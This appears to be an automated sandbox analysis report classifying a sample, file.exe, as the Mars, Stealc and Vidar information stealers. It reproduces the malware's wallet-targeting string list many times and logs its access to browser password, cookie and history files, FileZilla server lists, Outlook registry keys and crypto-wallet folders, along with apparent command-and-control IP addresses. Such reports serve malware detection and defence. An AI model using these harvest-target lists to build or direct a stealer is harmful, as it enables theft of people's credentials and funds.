Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77\Users\user\AppData\Roaming\Binance\.finger-print.fpon
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\MultiDoge\multidoge.walletH
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2450878675.0000000001B1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 9C680Q69ers\user\AppData\Roaming\Electrum-LTC\wallets\*.**O
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2449562218.0000000000856000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.0244247334.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2449562218.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3054902462.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0244247334.exe PID: 4320, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.0244247334.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2449562218.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3054902462.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3472, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467852 Sample: file.exe Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 81 Snort IDS alert for network traffic 2->81 83 Found malware configuration 2->83 85 Antivirus detection for URL or domain 2->85 87 16 other signatures 2->87 8 file.exe 37 2->8         started        13 explorti.exe 19 2->13         started        15 explorti.exe 2->15         started        process3 dnsIp4 69 85.28.47.30, 49704, 49720, 80 GES-ASRU Russian Federation 8->69 71 77.91.77.81, 49711, 49719, 49722 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->71 47 C:\Users\user\AppData\...\CFBAKEHIEB.exe, PE32 8->47 dropped 49 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->51 dropped 61 11 other files (7 malicious) 8->61 dropped 109 Detected unpacking (changes PE section rights) 8->109 111 Tries to steal Mail credentials (via file / registry access) 8->111 113 Found many strings related to Crypto-Wallets (likely being stolen) 8->113 121 4 other signatures 8->121 17 cmd.exe 1 8->17         started        19 cmd.exe 2 8->19         started        73 